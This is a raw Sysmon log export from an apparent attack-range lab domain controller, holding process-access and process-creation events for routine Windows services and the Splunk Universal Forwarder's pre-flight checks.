13:36:36.561{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003783Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.561{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EE4-6005-C200-00000000A301}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003782Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.561{59A5CD1D-8EE4-6005-C100-00000000A301}28722244C:\Windows\system32\cmd.exe{59A5CD1D-8EE4-6005-C200-00000000A301}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003781Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.563{59A5CD1D-8EE4-6005-C200-00000000A301}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{59A5CD1D-8EE4-6005-C100-00000000A301}2872C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1 10341000x80000000000000003780Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.546{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE4-6005-C100-00000000A301}2872C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003779Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.546{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003778Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.546{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003777Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.546{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003776Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.546{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003775Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.546{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003774Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.546{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003773Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.546{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003772Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.546{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003771Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.546{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003770Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.546{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EE4-6005-C100-00000000A301}2872C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003769Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.546{59A5CD1D-8EE3-6005-B100-00000000A301}41242852C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EE4-6005-C100-00000000A301}2872C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+eef54|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ebd15|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003768Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.558{59A5CD1D-8EE4-6005-C100-00000000A301}2872C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003767Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.530{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003766Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.499{59A5CD1D-8EE4-6005-C000-00000000A301}4436172C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003765Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.264{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE4-6005-C000-00000000A301}4436C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003764Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003763Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003762Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003761Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003760Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003759Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003758Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003757Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 